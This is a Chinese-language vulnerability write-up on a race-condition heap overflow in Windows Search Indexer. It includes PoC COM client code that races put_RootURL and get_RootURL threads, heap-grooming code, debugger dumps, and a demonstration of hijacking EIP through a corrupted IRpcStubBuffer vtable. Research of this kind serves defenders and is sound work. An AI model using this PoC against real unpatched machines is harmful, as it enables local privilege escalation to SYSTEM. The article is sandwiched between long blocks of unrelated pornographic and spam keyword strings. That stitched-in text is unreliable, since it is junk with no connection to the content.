精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Windows Search Indexer 本地提權漏洞分析

系統 Windows
Windows Service中最近發生的大多數LPE漏洞都是邏輯漏洞。通過這種方式,對Windows Search Indexer的內存損壞漏洞進行分析非常有趣。因此,此后的Windows Service中很可能會出現這種內存損壞漏洞。

[[352362]]

 Windows Search Indexer 介紹

Windows Search Indexer是一項Windows服務,用于為Windows Search處理文件索引,這為Windows內置的文件搜索引擎提供了動力,該引擎為從“開始”菜單搜索框到Windows資源管理器甚至是“庫”函數的所有函數提供支持。

Search Indexer有助于從GUI的角度通過GUI和索引選項將用戶定向到服務界面,如下所示。


索引過程中的所有數據庫和臨時數據都存儲為文件并進行管理。通常,在Windows Service中,整個過程都是使用NT AUTHORITY SYSTEM特權執行的。如果由于修改文件路徑而碰巧存在邏輯漏洞,則可能會觸發特權提升。(例如Symlink攻擊)

鑒于最近在Windows Service中發生的大多數漏洞都是由于邏輯漏洞而導致的LPE漏洞,因此我們假定Search Indexer可能有類似的漏洞,但是,我們的分析結果并非如此,隨后將介紹更多詳細信息。

補丁對比

分析環境是Windows7 x86,因為它具有較小的更新文件,并且易于識別差異,我們下載了該模塊的兩個補丁版本。

可以從Microsoft更新目錄下載它們:

  •  patch程序版本(1月程序):KB4534314 2
  •  補丁程序版本(2月補丁):KB4537813 3

我們從patch過的二進制文件的BinDiff開始(在這種情況下,只有一個:searchindexer.exe)

大多數補丁都是在CSearchCrawlScopeManager和CSearchRoot類中完成的。前者在1月進行了patch,而后者在下個月進行了patch。這兩個類都包含相同的更改,因此我們專注于patch的CSearchRoot。

下圖顯示添加了原始代碼,該代碼使用Lock來安全地訪問共享資源。我們推斷,訪問共享資源會導致競爭條件漏洞的發生,因為該補丁由putter, getter函數組成。


界面互動

我們參考了MSDN,了解如何使用這些類,并發現它們都與“爬網管理器”相關的,我們可以檢查此類的方法信息。

MSDN說4:

爬網范圍管理器(CSM)是一組API,可添加,刪除和枚舉Windows搜索索引器的搜索root和范圍規則。當希望索引器開始對新容器進行爬網時,可以使用CSM設置搜索root目錄,并為搜索root目錄內的路徑設置作用域規則。

CSM界面如下:

  •  IEnumSearchRoots
  •  IEnumSearchScopeRules
  •  ISearchCrawlScopeManager
  •  ISearchCrawlScopeManager2
  •  ISearchRoot
  •  ISearchScopeRule
  •  ISearchItem

例如,添加,刪除和枚舉搜索root和范圍規則可以通過以下方式編寫:

ISearchCrawlScopeManager告知搜索引擎要爬網和/或監視的容器,以及要包含或排除的容器下的項目。若要添加新的搜索,需要實例化ISearchRoot對象,設置root屬性,然后調用ISearchCrawlScopeManager :: AddRoot并將其傳遞給ISearchRoot對象的指針。

  1. // Add RootInfo & Scope Rule 
  2. pISearchRoot->put_RootURL(L"file:///C:\ "); 
  3. pSearchCrawlScopeManager->AddRoot(pISearchRoot); 
  4. pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\Windows", fInclude, FF_INDEXCOMPLEXURLS); 
  5.  
  6. // Set Registry key 
  7. pSearchCrawlScopeManager->SaveAll(); 

 當我們不再希望對該URL編制索引時,我們還可以使用ISearchCrawlScopeManager從爬網范圍中刪除root。刪除root還會刪除該URL的所有范圍規則。我們可以卸載應用程序,刪除所有數據,然后從爬網范圍中刪除搜索root,并且“爬網范圍管理器”將刪除root以及與該root相關聯的所有范圍規則。 

  1. // Remove RootInfo & Scope Rule 
  2. ISearchCrawlScopeManager->RemoveRoot(pszURL); 
  3.  
  4. // Set Registry key 
  5. ISearchCrawlScopeManager->SaveAll(); 

 CSM使用IEnumSearchRoots枚舉搜索root。出于多種目的,我們可以使用此類枚舉搜索root;例如,我們可能想要在用戶界面中顯示整個爬網范圍,或者發現爬網范圍中是否已經有特定的root目錄或root目錄的子級。 

  1. // Display RootInfo 
  2.  PWSTR pszUrl = NULL
  3.  pSearchRoot->get_RootURL(&pszUrl); 
  4.  wcout << L"\t" << pszUrl; 
  5.   
  6.  // Display Scope Rule 
  7.  IEnumSearchScopeRules *pScopeRules; 
  8.  pSearchCrawlScopeManager->EnumerateScopeRules(&pScopeRules); 
  9.   
  10.  ISearchScopeRule *pSearchScopeRule; 
  11.  pScopeRules->Next(1, &pSearchScopeRule, NULL)) 
  12.   
  13.  pSearchScopeRule->get_PatternOrURL(&pszUrl); 
  14.  wcout << L"\t" << pszUrl; 

 我們認為在處理URL的過程中會出現漏洞,因此,我們開始分析根本原因。

漏洞分析

我們針對以下函數進行了二進制分析:

  •  ISearchRoot :: put_RootURL
  •  ISearchRoot :: get_RootURL

在分析ISearchRoot :: put_RootURL和ISearchRoot :: get_RootURL時,我們發現引用了對象的共享變量(CSearchRoot + 0x14)。

put_RootURL函數將用戶控制的數據寫入CSearchRoot + 0x14的內存中。get_RootURL函數讀取位于CSearchRoot + 0x14內存中的數據,該漏洞似乎是由與補丁程序有關的共享變量引起的。

 

因此,我們終于到了漏洞開始的地方,該漏洞在發生以下情況時可能會觸發:

1. 首次提取:用作內存分配大小(第9行)

2. 第二次獲取:用作內存副本大小(第13行)

 如果第一個和第二個的大小不同,則可能會發生堆溢出,尤其是在第二個提取的大小較大時。我們認為,在發生內存復制之前,我們通過競爭條件充分更改了pszURL的大小。

崩潰現場

通過OleView 5,我們可以看到Windows Search Manager提供的界面,而且我們需要跟據接口的方法來攻擊漏洞函數。

  我們可以通過MSDN 6提供的基于COM的命令行源代碼輕松地對其進行測試,并編寫了攻擊存在漏洞的函數的COM客戶端代碼,如下所示:

  1. int wmain(int argc, wchar_t *argv[]) 
  2.     // Initialize COM library 
  3.     CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); 
  4.  
  5.     // Class instantiate 
  6.     ISearchRoot *pISearchRoot; 
  7.     CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pISearchRoot)); 
  8.  
  9.     // Vulnerable functions hit 
  10.     pISearchRoot->put_RootURL(L"Shared RootURL"); 
  11.     PWSTR pszUrl = NULL
  12.     HRESULT hr = pSearchRoot->get_RootURL(&pszUrl); 
  13.     wcout << L"\t" << pszUrl; 
  14.     CoTaskMemFree(pszUrl); 
  15.  
  16.     // Free COM resource, End 
  17.     pISearchRoot->Release(); 
  18.     CoUninitialize(); 

 漏洞觸發非常簡單。我們創建了兩個線程:一個線程將不同長度的數據寫入共享緩沖區,另一個線程同時從共享緩沖區讀取數據。 

  1. DWORD __stdcall thread_putter(LPVOID param) 
  2.  ISearchManager *pSearchManager = (ISearchManager*)param; 
  3.  while (1) { 
  4.   pSearchManager->put_RootURL(L"AA"); 
  5.   pSearchManager->put_RootURL(L"AAAAAAAAAA"); 
  6.  } 
  7.  return 0; 
  8. DWORD __stdcall thread_getter(LPVOID param) 
  9.  ISearchRoot *pISearchRoot = (ISearchRoot*)param; 
  10.  PWSTR get_pszUrl; 
  11.  while (1) { 
  12.   pISearchRoot->get_RootURL(&get_pszUrl); 
  13.  } 
  14.  return 0; 

 崩潰了!

  

毫無疑問,在StringCchCopyW函數復制RootURL數據之前,競爭條件已經成功,從而導致堆溢出。

劫持EIP

為了控制EIP,我們應該為發生漏洞的Sever堆創建一個對象。

我們編寫了如下的客戶端代碼,以跟蹤堆狀態。

  1. int wmain(int argc, wchar_t *argv[]) 
  2.     CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE); 
  3.     ISearchRoot *pISearchRoot[20]; 
  4.     for (int i = 0; i < 20; i++) { 
  5.         CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i])); 
  6.     } 
  7.     pISearchRoot[3]->Release(); 
  8.     pISearchRoot[5]->Release(); 
  9.     pISearchRoot[7]->Release(); 
  10.     pISearchRoot[9]->Release(); 
  11.     pISearchRoot[11]->Release(); 
  12.  
  13.      
  14.     CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL); 
  15.     CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL); 
  16.     Sleep(500); 
  17.      
  18.     CoUninitialize(); 
  19.     return 0; 

 我們發現,如果客戶端不釋放pISearchRoot對象,則IRpcStubBuffer對象將保留在服務器堆上。而且我們還看到IRpcStubBuffer對象保持在發生漏洞的堆的位置附近。

  1. 0:010> !heap -p -all 
  2.   ... 
  3.   03d58f10 0005 0005  [00]   03d58f18    0001a - (busy)     <-- CoTaskMalloc return 
  4.    mssprxy!_idxpi_IID_Lookup  (mssprxy+0x75) 
  5.   03d58f38 0005 0005  [00]   03d58f40    00020 - (free
  6.   03d58f60 0005 0005  [00]   03d58f68    0001c - (busy)     <-- IRpcStubBuffer Obj 
  7.     ? mssprxy!_ISearchRootStubVtbl+10 
  8.   03d58f88 0005 0005  [00]   03d58f90    0001c - (busy) 
  9.     ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj 
  10.   03d58fb0 0005 0005  [00]   03d58fb8    00020 - (busy) 
  11.   03d58fd8 0005 0005  [00]   03d58fe0    0001c - (busy) 
  12.     ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj 
  13.   03d59000 0005 0005  [00]   03d59008    0001c - (busy) 
  14.     ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj 
  15.   03d59028 0005 0005  [00]   03d59030    00020 - (busy) 
  16.   03d59050 0005 0005  [00]   03d59058    00020 - (busy) 
  17.   03d59078 0005 0005  [00]   03d59080    00020 - (free
  18.   03d590a0 0005 0005  [00]   03d590a8    00020 - (free
  19.   03d590c8 0005 0005  [00]   03d590d0    0001c - (busy) 
  20.     ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj 

 在COM中,所有接口都有自己的接口存根空間。存根是用于在RPC通信期間支持遠程方法調用的較小內存空間,IRpcStubBuffer是此類接口存root的主要接口。在此過程中,支持pISearchRoot的接口存root的IRpcStubBuffer仍保留在服務器的堆上。

IRpcStubBuffer的vtfunction如下:

  1. 0:003> dds poi(03d58f18) l10 
  2.   71215bc8  7121707e mssprxy!CStdStubBuffer_QueryInterface 
  3.   71215bcc  71217073 mssprxy!CStdStubBuffer_AddRef 
  4.   71215bd0  71216840 mssprxy!CStdStubBuffer_Release 
  5.   71215bd4  71217926 mssprxy!CStdStubBuffer_Connect 
  6.   71215bd8  71216866 mssprxy!CStdStubBuffer_Disconnect <-- client call : CoUninitialize(); 
  7.   71215bdc  7121687c mssprxy!CStdStubBuffer_Invoke 
  8.   71215be0  7121791b mssprxy!CStdStubBuffer_IsIIDSupported 
  9.   71215be4  71217910 mssprxy!CStdStubBuffer_CountRefs 
  10.   71215be8  71217905 mssprxy!CStdStubBuffer_DebugServerQueryInterface 
  11.   71215bec  712178fa mssprxy!CStdStubBuffer_DebugServerRelease 

 當客戶端的COM未初始化時,IRpcStubBuffer :: Disconnect斷開對象指針的所有連接。因此,如果客戶端調用CoUninitialize函數,則會在服務器上調用CStdStubBuffer_Disconnect函數。這意味著用戶可以構造偽造的vtable并調用該函數。

但是,我們并不總是看到IRpcStubBuffer分配在同一位置堆上。因此,需要多次嘗試來構造堆布局,經過幾次嘗試后,IRpcStubBuffer對象被如下可控值(0x45454545)覆蓋。

最后,我們可以證明可以間接調用內存中的函數!

 

分析結論

Windows Service中最近發生的大多數LPE漏洞都是邏輯漏洞。通過這種方式,對Windows Search Indexer的內存損壞漏洞進行分析非常有趣。因此,此后的Windows Service中很可能會出現這種內存損壞漏洞。

我們希望該分析將對其他漏洞研究人員有所幫助,并可以用于進一步的研究。

參考文獻

  • https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments ↩
  •  https://www.catalog.update.microsoft.com/Search.aspx?q=KB4534314 ↩
  •  https://www.catalog.update.microsoft.com/Search.aspx?q=KB4537813 ↩
  •  https://docs.microsoft.com/en-us/windows/win32/search/-search-3x-wds-extidx-csm ↩
  •  https://github.com/tyranid/oleviewdotnet ↩
  •  https://docs.microsoft.com/en-us/windows/win32/search/-search-sample-crawlscopecommandline ↩

本文翻譯自:http://blog.diffense.co.kr/2020/03/26/SearchIndexer.html如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2020-10-06 13:58:25

漏洞

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2013-11-29 15:34:00

2010-02-02 15:40:11

2023-10-09 18:22:35

2023-06-11 17:24:26

2009-04-24 14:08:25

2009-04-24 14:34:51

2017-04-17 20:08:19

2015-03-13 10:06:55

2017-04-07 09:46:16

2023-09-11 06:59:59

2025-05-14 06:00:00

漏洞終端安全網絡安全

2022-04-28 10:54:52

惡意軟件漏洞微軟

2010-01-23 21:25:34

2010-12-10 15:23:49

Linux漏洞

2022-03-10 09:41:15

漏洞Linux內核

2025-04-18 10:17:47

2016-05-17 09:42:16

2021-01-13 08:14:36

Windows提權漏洞攻擊
點贊
收藏

51CTO技術棧公眾號

亚洲成熟丰满熟妇高潮xxxxx| 好吊色欧美一区二区三区四区| 日韩视频在线观看免费视频| 国产极品一区| 亚洲一二三专区| 欧美h视频在线| 国产视频一区二区三| 99riav1国产精品视频| 在线国产精品播放| 国产精品日日摸夜夜爽| 少妇一区视频| 一区二区激情视频| 日韩欧美一区二区三区四区五区 | 综合天天久久| 国产婷婷成人久久av免费高清| 手机看片一级片| 国产精品yjizz视频网| 国产精品久久久爽爽爽麻豆色哟哟| 丁香婷婷久久久综合精品国产 | 欧美军同video69gay| 91精品91久久久中77777老牛| 男人在线资源站| 成码无人av片在线观看网站| 日本vs亚洲vs韩国一区三区二区 | 91精品国产91久久综合桃花| 日本中文字幕网址| 菠萝蜜视频国产在线播放| 久久亚洲综合色一区二区三区| 亚洲一区亚洲二区| 欧美成人一区二区视频| 宅男噜噜噜66一区二区| 久久夜精品va视频免费观看| 亚洲成人网在线播放| youjizz欧美| 欧美一区二区精美| 日韩av自拍偷拍| 国产麻豆久久| 色综合视频在线观看| 亚洲理论电影在线观看| 羞羞视频在线观看不卡| 中文字幕一区二区三区乱码在线| 日本一区免费看| 天堂中文在线视频| 99精品视频一区| 国产精品免费一区二区三区在线观看| av中文字幕免费| 极品少妇xxxx精品少妇偷拍 | www一区二区三区| 欧美日韩免费一区二区三区视频| www.xxx亚洲| **在线精品| 色偷偷一区二区三区| 黄色一级片播放| 九色porny丨国产首页在线| 亚洲午夜日本在线观看| 免费人成自慰网站| 超碰中文在线| 婷婷亚洲久悠悠色悠在线播放 | gogo高清在线播放免费| 亚洲国产一区在线观看| 国产免费一区二区视频| 超碰激情在线| 欧美视频在线看| 激情婷婷综合网| 成人国产精选| 欧美一区二区精品久久911| 4438x全国最大成人| 国产精品男女| 精品一区二区三区四区| 西西444www无码大胆| 精品视频久久| 久久人人爽人人爽爽久久| wwwav国产| 亚洲国产一区二区三区高清| 456亚洲影院| 97人妻精品视频一区| 精品一区二区三区视频在线观看| 91香蕉亚洲精品| 色婷婷激情五月| 久久久不卡网国产精品二区| 一区二区三区国产福利| 日本在线观看大片免费视频 | 中文字幕91爱爱| 韩国毛片一区二区三区| 国产精选在线观看91| 久久久久久久久亚洲精品| 中文字幕一区二区视频| 18禁网站免费无遮挡无码中文| 天堂av在线| 在线成人av影院| 精品一区二区三区四区五区六区| 国产成人1区| 裸体女人亚洲精品一区| 精品国产免费观看| 精品一区二区久久| 黑人另类av| 欧美成人高清在线| 香蕉成人伊视频在线观看| 91制片厂毛片| 盗摄牛牛av影视一区二区| 亚洲美女在线看| 欧美日韩在线观看成人| 天堂一区二区在线| 91久久精品www人人做人人爽| 九色在线免费| 一级女性全黄久久生活片免费| 玩弄japan白嫩少妇hd| 亚洲精品在线a| 中文字幕亚洲自拍| 中文字幕在线观看视频网站| 国产麻豆91精品| 日本一区二区三区视频在线播放 | 日韩av大片免费看| 精品人妻av一区二区三区| 欧美激情资源网| 久久成人免费观看| 亚洲一级大片| 久久精品美女视频网站| 日韩黄色一级视频| 91在线丨porny丨国产| 毛片在线视频观看| 成年永久一区二区三区免费视频 | 国产精品露出视频| 黄色在线免费网站| 欧美日本一区二区三区四区| 成人免费网站黄| 国产欧美欧美| 国产在线精品一区二区三区| www红色一片_亚洲成a人片在线观看_| 欧美亚洲自拍偷拍| 亚洲精品成人无码熟妇在线| 极品少妇一区二区三区| 91gao视频| 曰本三级在线| 日韩视频不卡中文| 极品颜值美女露脸啪啪| 蜜臀av国产精品久久久久| 蜜桃精品久久久久久久免费影院| 蜜桃麻豆影像在线观看| 亚洲国产精久久久久久| 国产一级二级毛片| 粉嫩嫩av羞羞动漫久久久| 国产精品国三级国产av| 欧美二区观看| 久久91亚洲精品中文字幕| 国产夫妻在线观看| 亚洲最新在线观看| 亚洲少妇一区二区三区| 影音先锋亚洲精品| 国严精品久久久久久亚洲影视| free性护士videos欧美| 亚洲电影免费观看高清| 国产精品免费av一区二区| heyzo一本久久综合| 免费在线观看亚洲视频| 无码少妇一区二区三区| 日韩av高清不卡| 男女视频在线观看免费| 色天天综合久久久久综合片| 69精品无码成人久久久久久| 麻豆精品在线视频| 欧美三级午夜理伦三级老人| 深夜福利一区二区三区| 欧美极品第一页| 天天操天天干天天干| 色综合天天综合色综合av| 丁香激情五月少妇| 国产一区二区在线视频| 欧美图片激情小说| 婷婷激情久久| 国产欧美一区二区| h视频在线免费观看| 亚洲成人三级在线| 99re这里只有精品在线| 中文字幕中文字幕在线一区| 无码国产精品一区二区高潮| 99在线热播精品免费99热| 日本三级中国三级99人妇网站| 日韩国产大片| 国模极品一区二区三区| 日本在线视频1区| 欧美视频第二页| 免费成年人视频在线观看| 成人免费视频视频在线观看免费| jizzjizzxxxx| 99re6这里只有精品| 高清国语自产拍免费一区二区三区 | 久久青草欧美一区二区三区| 国产精品v日韩精品v在线观看| 欧美午夜不卡| 日韩和欧美的一区二区| av在线播放一区二区| 久久久亚洲国产| 成人一区二区不卡免费| 精品欧美乱码久久久久久| 亚洲欧美一区二区三区在线观看| 1024亚洲合集| 黄色正能量网站| 国产激情一区二区三区四区| 日韩 欧美 高清| 欧美激情视频一区二区三区在线播放| 国产麻豆日韩| 亚洲热av色在线播放| 538国产精品一区二区免费视频| av免费在线一区二区三区| 精品国产百合女同互慰| 一级黄色片在线播放| 欧美性猛交xxxx免费看久久久| 免费国产羞羞网站美图| 久久久不卡影院| 亚洲精品女人久久久| 国产精品99久久久久| 亚洲一区二区三区四区五区xx| 亚洲美女啪啪| 超碰10000| 久久一级电影| 日韩国产伦理| 久久精品66| 亚洲自拍偷拍第一页| 国产在线|日韩| 欧洲亚洲女同hd| 色是在线视频| 91精品国产高清自在线看超| 丝袜美腿av在线| 久久91亚洲人成电影网站| 毛片在线看片| 日韩中文字幕精品| 在线观看av的网站| 国产午夜精品一区理论片飘花 | 日韩视频精品在线| 91精品大全| 中文在线不卡视频| 国产三级在线看| 一区二区三区回区在观看免费视频| 深夜福利视频网站| 亚洲高清在线观看| 亚洲欧美高清视频| 欧美精品一区二区三区高清aⅴ| 国产男男gay体育生网站| 欧美疯狂性受xxxxx喷水图片| 中文字幕二区三区| 欧美日韩在线综合| 国产精品国产三级国产普通话对白| 欧洲av一区二区嗯嗯嗯啊| 国产免费a视频| 在线观看亚洲成人| 中文字幕一区二区人妻痴汉电车 | 性chinese极品按摩| 日韩高清在线不卡| 亚洲激情在线观看视频| 免费国产亚洲视频| 天天操狠狠操夜夜操| 激情六月婷婷久久| 69久久精品无码一区二区 | 欧美综合在线视频| 中文字幕人妻一区二区在线视频| 欧美综合色免费| 91欧美日韩麻豆精品| 日韩一级完整毛片| 内射后入在线观看一区| 精品亚洲va在线va天堂资源站| 你懂的在线看| 色妞色视频一区二区三区四区| 国产在线看片| 欧美高清第一页| 天堂√中文最新版在线| 国产精品网址在线| 日韩欧美激情电影| 久久大香伊蕉在人线观看热2| 自拍自偷一区二区三区| 亚洲欧美日本国产有色| 91成人精品| 少妇高潮喷水在线观看| 日韩电影在线观看一区| 欧美激情第四页| 成人国产亚洲欧美成人综合网| 精品无码国产一区二区三区51安| 久久久精品人体av艺术| 久久av红桃一区二区禁漫| 亚洲国产日韩精品| 日本免费精品视频| 91精品国产一区二区三区| 熟妇人妻一区二区三区四区| 亚洲天堂色网站| a毛片在线观看| 欧美在线视频一二三| 亚洲欧美在线综合| 精品蜜桃一区二区三区| 欧美激情另类| 俄罗斯av网站| 激情综合色综合久久| 网站免费在线观看| 中文字幕五月欧美| 日韩av大片在线观看| 51精品视频一区二区三区| 四虎精品在线| 欧美激情三级免费| 91精品国产66| 精品国产乱码久久久久久丨区2区| 日韩黄色大片| 六月丁香激情网| 国产成人亚洲综合a∨婷婷图片| 成年人在线观看av| 一区二区三区四区高清精品免费观看| chinese国产精品| 精品久久久久久久一区二区蜜臀| 成人高清网站| 欧美一区二区.| eeuss鲁片一区二区三区| 亚洲砖区区免费| 乱码第一页成人| 久久免费精品国产| 亚洲女女做受ⅹxx高潮| 自拍偷拍色综合| 亚洲欧美一区二区三区久久| 日本aa在线| 成人欧美一区二区三区在线湿哒哒| 欧美jizz19性欧美| 女女百合国产免费网站| 美女在线视频一区| 免费福利视频网站| 日韩欧美亚洲成人| 五月婷婷六月丁香综合| 欧美精品www在线观看| 国产不卡精品在线| 一级二级三级欧美| 日本91福利区| 亚洲一区二区自偷自拍| 日本韩国欧美一区二区三区| 亚洲aⅴ乱码精品成人区| 欧美激情视频给我| a级日韩大片| 99久久久精品视频| 国产91在线观看| 久久久久亚洲AV| 欧美大片在线观看| 性欧美1819sex性高清大胸| 亚洲自拍偷拍福利| 国产精品av久久久久久麻豆网| 亚洲黄色av片| 亚洲欧美偷拍卡通变态| 国产精品久久久久久久久久久久久久久久久久 | 欧美成人免费网站| 日韩123区| 好吊色欧美一区二区三区| 91久久亚洲| a级一a一级在线观看| 欧美日韩亚洲91| 三级理论午夜在线观看| 欧洲成人在线观看| 国内精品视频在线观看| 男女无套免费视频网站动漫| 欧美激情中文字幕一区二区| 亚洲图片中文字幕| xxxx性欧美| 一区二区三区国产好| 大伊香蕉精品视频在线| 成人精品国产免费网站| 国产 欧美 日韩 在线| 日韩av网站电影| 深夜成人影院| 一区二区三区我不卡| 国产麻豆精品在线观看| 国产在线观看99| 精品一区二区三区电影| 欧美成人aaa| 激情五月五月婷婷| 成人av片在线观看| 国产主播第一页| 久久久999精品| 波多野结衣在线一区二区| www.爱色av.com| 国产精品久久毛片a| www男人的天堂| 奇米4444一区二区三区| 日韩系列欧美系列| 麻豆tv在线观看| 色婷婷综合中文久久一本| 美女av在线播放| 免费不卡亚洲欧美| 久久99精品久久久久久| 精品成人免费视频| 三级精品视频久久久久| jizz性欧美23| 亚洲一二三区av| 亚洲丰满少妇videoshd| 成a人v在线播放| 波多野结衣精品久久| 日韩激情一区二区| 久草免费新视频| 尤物九九久久国产精品的特点| 亚洲小说春色综合另类电影| 美女喷白浆视频| 午夜精品福利一区二区三区av | 国产精品丝袜黑色高跟| 成人毛片在线免费观看| 国产精品久久久久77777| 亚洲国产午夜| 永久免费看黄网站| 一本色道久久综合亚洲精品小说 |